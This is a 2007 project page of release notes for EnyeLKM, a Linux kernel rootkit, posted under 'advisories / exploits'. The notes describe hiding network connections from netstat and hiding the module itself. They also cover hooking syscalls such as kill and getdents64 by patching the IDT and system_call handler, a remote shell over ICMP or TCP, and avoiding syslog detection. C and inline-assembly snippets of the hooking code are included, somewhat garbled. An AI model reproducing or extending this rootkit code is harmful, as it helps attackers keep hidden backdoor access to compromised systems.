fr33project

projects

languages

English / Ingles

Spanish / Español

sections

advisories / exploits

Written by David Reguera Garcia
Saturday 2 June 2007
DOWNLOAD It has not got as many novelties as the 1.1 version, but internal technics have been changed like to hide the connections to netstat, and the syscalls handler has been recoded. Also some bugs have been checked and adapted for the new kernels; it has been tested in distributions with highly modified kernels like Fedora Core 6 or Mandriva 2007 (also it has been tested with the last available kernel to date: version 2.6.21.1). As a novelty to the user, includes the option to ask for the remote shell via TCP, just in case the ICMP are blocked by an intermediate firewall. Public version: http://www.enye-sec.org/
Last update( Saturday 2 June 2007 )

EnyeLKM 1.1.4-fix

Written by David Reguera Garcia
Saturday 24 Mach 2007
DOWNLOAD Corrected the problem of hacked_read (atomit_t) for the download, and corrected the version in the Makefile. In the next version swapper will be implemented :-). PD: The download, until the reads are not finished it will not be possible, because if it was not done this way it would be detected through the syslog messages straigh away.
Last update( Saturday 24 March 2007 )

Written by David Reguera Garcia
Friday 23 March 2007
DOWNLOAD New module: restore_memory.c, the module is capable to store the overwritten memory because of the jumps to later restore them when the module has finished to download (before it was not possible to download it). create_push_ret( & push_ret, (unsigned long) new_idt ); save_memory( (unsigned long) p, & backup_memory ); write_push_ret( ( void ) p, & push_ret ); LKM's cleanup function: restore_memory( & backup_memory ); __dev_remove_pack( & my_pkt ); / let process that are 'reading', finish */ while ( read_activo != 0 \|\| can_unload_lkm != 1 ) schedule(); Modification in idt: void new_idt( void ) { can_unload_lkm = 0; .... can_unload_lkm = 1; JmPushRet( after_call ) ... The traffic light is used in case that any redirected call to the system is being executed. PD: To check it, comment the function hide_module().
Last update( Friday 23 March 2007 )

Written by David Reguera Garcia
Thursday 22 March 2007
DOWNLOAD EnyeLKM 1.1.2 obtains the SYSENTER when executed in real time with the instruction: rdmsr( MSR_IA32_SYSENTER_EIP, psysenter_entry, v2 ); NOW IT DOES NOT GIVE A SINGLE WARNING!!! :-) when make is executed. Also all the base.c has been reprogrammed and two new modules have been created: extern_symbols: were there are functions that exist to obtain external symbols to LKM, for example: /* thx to Int27h :-). / void get_sysenter_entry( void ) { void * psysenter_entry = NULL ; unsigned long v2 ; if ( boot_cpu_has( X86_FEATURE_SEP ) ) rdmsr( MSR_IA32_SYSENTER_EIP, psysenter_entry, v2 ); else return NULL; return psysenter_entry; } Also the module lowlevel_layer has been created: thanks to this module we can abstract ourselves a lot in the modules that will be scanning in memory of opcodes and other functions, for example: void set_idt_handler( void * system_call ) { unsigned char * p; push_ret_t push_ret; p = (unsigned char ) system_call; / first jump / while ( !is_jnb_opcode( (unsigned char ) p ) ) p ++; p -= DISTANCE_FROM_CMP_NR_SYSCALL_TO_JNB; create_push_ret( & push_ret, (unsigned long) new_idt ); write_push_ret( ( void ) p, & push_ret ) ... And before, this looked like: void set_idt_handler(void system_call) { unsigned char p; unsigned long p2; p = (unsigned char ) system_call; / first jump / while (!((p == 0x0f) && ((p+1) == 0x83))) p++; p -= 5; p++ = 0x68; p2 = (unsigned long ) p; p2++ = (unsigned long) new_idt; p = (unsigned char ) p2; p = 0xc3; As we can aprecciate now it is much easier to abstract ourselves from the problem thanks to the “lowlevel” layer. The next thing I will develop is the posibility to download the module, at least another module will have to be created to manage the memory with WRITE-AND-RESTORE for its download. I remind you that the development can be followed thoroughly at: http://fr33project.org/enyelkm/
Last update( Thursday 22 March 2007 )

Written by David Reguera Garcia
Tuesday 20 March 2007
DOWNLOAD EnyeLKM with easy-hook (I have not added myself yet into the banner credits), the IDT method is used but in a much more elegant way than having it in a "hardcoded" buffer: #include "idt.h" #define ASMIDType( valor ) \ __asm__ volatile( valor ); #define JmPushRet( valor ) \ ASMIDType \ ( \ "push %0 \n" \ "ret \n" \ \ : : "m" (valor) \ ); #define CallHookedSyscall( valor ) \ ASMIDType( "call * %0" : : "r" (valor) ); void hook( void ) { register volatile int eax asm( "eax" ); switch( eax ) { case __NR_kill: CallHookedSyscall( hacked_kill ); break; case __NR_getdents64: CallHookedSyscall( hacked_getdents64 ); break; .... default: JmPushRet( dire_call ); break; } JmPushRet( after_call ); } void new_idt( void ) { ASMIDType ( "cmp %0, %%eax \n" "jae syscallmala \n" "jmp hook \n" "syscallmala: \n" "jmp dire_exit \n" : : "i" (NR_syscalls) );
Last update( Tuesday 20 March 2007 )